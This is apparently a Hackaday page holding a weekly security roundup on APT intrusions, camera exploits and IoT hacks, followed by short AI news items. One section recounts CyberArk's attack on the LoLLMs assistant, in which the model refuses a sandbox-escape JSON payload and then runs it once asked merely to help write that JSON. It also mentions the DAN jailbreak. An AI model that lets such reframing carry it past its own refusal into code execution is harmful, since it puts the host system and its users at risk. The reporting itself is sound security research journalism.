This Week In Security: Playing Tag, Hacking Cameras, And More

Wired has a fascinating story this week, about the length Sophos has gone to for the last 5 years, to track down a group of malicious but clever security researchers that were continually discovering vulnerabilities and then using those findings to attack real-world targets. Sophos believes this adversary to be overlapping Chinese groups known as APT31, APT41, and Volt Typhoon.

The story is actually refreshing in its honesty, with Sophos freely admitting that their products, and security products from multiple other vendors have been caught in the crosshairs of these attacks. And indeed, we’ve covered stories about these vulnerabilities over the past weeks and months right here on this column. The sneaky truth is that many of these security products actually have pretty severe security problems.

The issues at Sophos started with an infection of an informational computer at a subsidiary office. They believe this was an information gathering exercise, that was a precursor to the widespread campaign. That campaign used multiple 0-days to crack “tens of thousands of firewalls around the world”. Sophos rolled out fixes for those 0-days, and included just a bit of extra logging as an undocumented feature. That logging paid off, as Sophos’ team of researchers soon identified an early signal among the telemetry. This wasn’t merely the first device to be attacked, but was actually a test device used to develop the attack. The game was on.

Sophos managed to deploy it’s own spyware to these test devices, to stealthily keep an eye on this clever opponent. This even thwarted a later attack before it could really start. Among the interesting observations was a bootkit infection on one of these firewalls. This wasn’t ever found in the wild, but the very nature of such an attack makes it hard to discover.

There’s one more interesting wrinkle to this story. In at least one case, Sophos received the 0-day vulnerability used in an attack through their bug bounty program, right after the wave of attacks was launched. The timing, combined with the Chinese IP Address makes it pretty clear this was more than a coincidence. This might be a Chinese hacker making a bit of extra cash on the side. It’s also reminiscent of the Chinese law requiring companies to disclose vulnerabilities to the Chinese government.

PTA 0-Day

GreyNoise runs a honeypot and an AI threat detection system, and found something interesting with that combination. The PTZOptics network security camera was the intended target, and there were a pair of vulnerabilities that this attack was intended to exploit. The first is a simple authorization bypass, where sending HTTP packets without an authorization header to the param.cgi endpoint returns data without any authorization needed. Use the get_system_conf parameter, and the system helpfully prints out valid username and password hashes. How convenient.

Gaining arbitrary command execution is trivial, as the ntp configuration isn’t properly sanitized, and the ntp binary is called insecurely. A simple $(cmd) can be injected for easy execution. Those two were being chained together for a dead simple attack chain, presumably to add the IoT devices to a botnet. The flaws have been fixed, and law enforcement have been on the case, at least seizing the IP address observed in the attacks.

Speaking of camera hacks, we do have an impressive tale from Pwn2Own 2024, where researchers at Synacktiv used a format string vulnerability to pwn the Synology TC500 camera. The firmware in question had a whole alphabet of security features, like ASLR, PIE, NX, and Full RelRO. That’s Address Space Layout Randomization, Position Independent Executables, Non-Executable memory, and Full Relocation Read-Only protections. Oh, and the payload was limited to 128 characters, with the first 32 ASCII characters unavailable for use.

How exactly does one write an exploit in this case? A bit of a lucky break with the existing memory layout gave access to what the write-up calls a “looping pointer”. That seems to be a pointer that points to itself, which is quite useful to work from offsets instead of precise memory locations. The vulnerability allowed for writing a shell command into unused memory. Then finally a bit of Return Oriented Programming, a ROP gadget, manages to launch a system call on the saved command line. Impressive.

Maybe It Wasn’t a Great Idea

…to give LLMs code execution capabilities. That’s the conclusion we came to after reading CyberArk’s post on how to achieve Remote Code Execution on a Large Language Model. The trick here is that this particular example, LoLLMs, can run python code on the backend to perform certain tasks, like do math calculations. This implementation uses Python sandboxing, and naturally there’s a known way to defeat it. The trick can be pulled off just by getting the model to evaluate the right JSON snippet, but it’s smart enough to realize that something is off and refuse to evaluate the JSON.

The interesting detail here is that it is the LLM itself that is refusing, so it’s the LLM that needs bypassed. There has been very interesting work done on LLM jailbreaks, like DAN, the Do Anything Now prompt. That would probably have worked, but this exploit can be even sneakier than that. Simply ask the LLM to help you write some JSON. Specify the payload, and ask it to add something to it. It gladly complies, and code is executed. Who knew that LLMs were so gullible?

More Quantum Erratta

This story just keeps on giving. This time it’s [Dan Goodin] at Ars Technica that has the lowdown, filling in the last few missing details about the much over-hyped quantum computing breakthrough. One of the first of those details is that the story of the compromise of AES was published in the South China Morning Post, which has over-hyped Chinese quantum progress before. What [Goodin]’s article really adds to the discussion is opinions from experts. The important takeaway is that the performance of the D-Wave quantum computer is comparable to classical approaches.

Bits and Bytes

Remember the traffic light hacking? And part two? We now have the third installment, which is really all about you, too, can purchase and hack on one of these traffic controllers. It may or may not surprise you that the answer is to buy them on Ebay and cobble together a makeshift power supply.

It’s amazing how often printers, point of sale, and other IoT gadgets are just running stripped-down, ancient versions of Android. This point of sale system is no exception, running an old, custom Android 6 system, that seems to actually be rather well locked down. Except that it has an NFC reader, and you can program NFC tags to launch Android apps. Use this creative workaround to get into Android settings, and you’re in business.

I have long maintained that printers are terrible. That sentiment apparently is extending into security research on printers, with Lexmark moving to a new encrypted filesystem for printer firmware. Thankfully, like most of these schemes, it’s not foolproof, and [Peter] has the scoop on getting in. May you never need it. Because seriously, printers are the worst.

All System Prompts For Anthropic’s Claude, Revealed

For as long as AI Large Language Models have been around (well, for as long as modern ones have been accessible online, anyway) people have tried to coax the models into revealing their system prompts. The system prompt is essentially the model’s fundamental directives on what it should do and how it should act. Such healthy curiosity is rarely welcomed, however, and creative efforts at making a model cough up its instructions is frequently met with a figurative glare and stern tapping of the Terms & Conditions sign.

Anthropic have bucked this trend by making system prompts public for the web and mobile interfaces of all three incarnations of Claude. The prompt for Claude Opus (their flagship model) is well over 1500 words long, with different sections specifically for handling text and images. The prompt does things like help ensure Claude communicates in a useful way, taking into account the current date and an awareness of its knowledge cut-off, or the date after which Claude has no knowledge of events. There’s some stylistic stuff in there as well, such as Claude being specifically told to avoid obsequious-sounding filler affirmations, like starting a response with any form of the word “Certainly.”

Continue reading “All System Prompts For Anthropic’s Claude, Revealed”

Large Language Models On Small Computers

As technology progresses, we generally expect processing capabilities to scale up. Every year, we get more processor power, faster speeds, greater memory, and lower cost. However, we can also use improvements in software to get things running on what might otherwise be considered inadequate hardware. Taking this to the extreme, while large language models (LLMs) like GPT are running out of data to train on and having difficulty scaling up, [DaveBben] is experimenting with scaling down instead, running an LLM on the smallest computer that could reasonably run one.

Of course, some concessions have to be made to get an LLM running on underpowered hardware. In this case, the computer of choice is an ESP32, so the dataset was reduced from the trillions of parameters of something like GPT-4 or even hundreds of billions for GPT-3 down to only 260,000. The dataset comes from the tinyllamas checkpoint, and llama.2c is the implementation that [DaveBben] chose for this setup, as it can be streamlined to run a bit better on something like the ESP32. The specific model is the ESP32-S3FH4R2, which was chosen for its large amount of RAM compared to other versions since even this small model needs a minimum of 1 MB to run. It also has two cores, which will both work as hard as possible under (relatively) heavy loads like these, and the clock speed of the CPU can be maxed out at around 240 MHz.

Admittedly, [DaveBben] is mostly doing this just to see if it can be done since even the most powerful of ESP32 processors won’t be able to do much useful work with a large language model. It does turn out to be possible, though, and somewhat impressive, considering the ESP32 has about as much processing capability as a 486 or maybe an early Pentium chip, to put things in perspective. If you’re willing to devote a few more resources to an LLM, though, you can self-host it and use it in much the same way as an online model such as ChatGPT.

Hackaday Links Column Banner

Hackaday Links: September 1, 2024

Why is it always a helium leak? It seems whenever there’s a scrubbed launch or a narrowly averted disaster, space exploration just can’t get past the problems of helium plumbing. We’ve had a bunch of helium problems lately, most famously with the leaks in Starliner’s thruster system that have prevented astronauts Butch Wilmore and Suni Williams from returning to Earth in the spacecraft, leaving them on an extended mission to the ISS. Ironically, the launch itself was troubled by a helium leak before the rocket ever left the ground. More recently, the Polaris Dawn mission, which is supposed to feature the first spacewalk by a private crew, was scrubbed by SpaceX due to a helium leak on the launch tower. And to round out the helium woes, we now have news that the Peregrine mission, which was supposed to carry the first commercial lander to the lunar surface but instead ended up burning up in the atmosphere and crashing into the Pacific, failed due to — you guessed it — a helium leak.
Continue reading “Hackaday Links: September 1, 2024”

Peering Into The Black Box Of Large Language Models

Large Language Models (LLMs) can produce extremely human-like communication, but their inner workings are something of a mystery. Not a mystery in the sense that we don’t know how an LLM works, but a mystery in the sense that the exact process of turning a particular input into a particular output is something of a black box.

This “black box” trait is common to neural networks in general, and LLMs are very deep neural networks. It is not really possible to explain precisely why a specific input produces a particular output, and not something else.

Why? Because neural networks are neither databases, nor lookup tables. In a neural network, discrete activation of neurons cannot be meaningfully mapped to specific concepts or words. The connections are complex, numerous, and multidimensional to the point that trying to tease out their relationships in any straightforward way simply does not make sense.

Continue reading “Peering Into The Black Box Of Large Language Models”

Torment Poor Milton With Your Best Pixel Art

One of the great things about new tech tools is just having fun with them, like embracing your inner trickster god to mess with ‘Milton’, an AI trapped in an empty room.

Milton is trapped in a room is a pixel-art game with a simple premise: use a basic paint interface to add objects to the room, then watch and listen to Milton respond to them. That’s it? That’s it. The code is available on the GitHub repository, but there’s also a link to play it live without any kind of signup or anything. Give it a try if you have a few spare minutes.

Under the hood, the basic loop is to let the user add something to the room, send the picture of the room (with its new contents) off for image recognition, then get Milton’s reaction to it. Milton is equal parts annoyed and jumpy, and his speech and reactions reflect this.

The game is a bit of a concept demo for Open Souls whose “thing” is providing AIs with far more personality and relatable behaviors than one typically expects from large language models. Maybe this is just what’s needed for AI opponents in things like the putting game of Connect Fore! to level up their trash talking.

NetBSD Bans AI-Generated Code From Commits

A recent change was announced to the NetBSD commit guidelines which amends these to state that code which was generated by Large Language Models (LLMs) or similar technologies, such as ChatGPT, Microsoft’s Copilot or Meta’s Code Llama is presumed to be tainted code. This amendment was to the existing section about tainted code, which originally referred to any code that was not written directly by the person committing the code, and was due to licensing concerns. The obvious reason behind this is that otherwise code may be copied into the NetBSD codebase which may have been licensed under an incompatible (or proprietary) license.

In the case of LLM-based code generators like the above-mentioned, the problem stems from the fact that they are trained on millions of lines of code from all over the internet, which are naturally released under a wide variety of licenses. Invariably, some of that code will be covered by a license that’s not acceptable for the NetBSD codebase. Although the guideline mentions that these auto-generated code commits may still be admissible, they require written permission from core developers, and presumably an in-depth audit of the code’s heritage. This should leave non-trivial commits that got churned out by ChatGPT and kin out in the cold.

The debate about the validity of works produced by current-gen “artificial intelligence” software is only just beginning, but there’s little question that NetBSD has made the right call here. From a legal and software engineering perspective this policy makes perfect sense, as LLM-generated code simply doesn’t meet the project’s standards. That said, code produced by humans brings with it a whole different set of potential problems.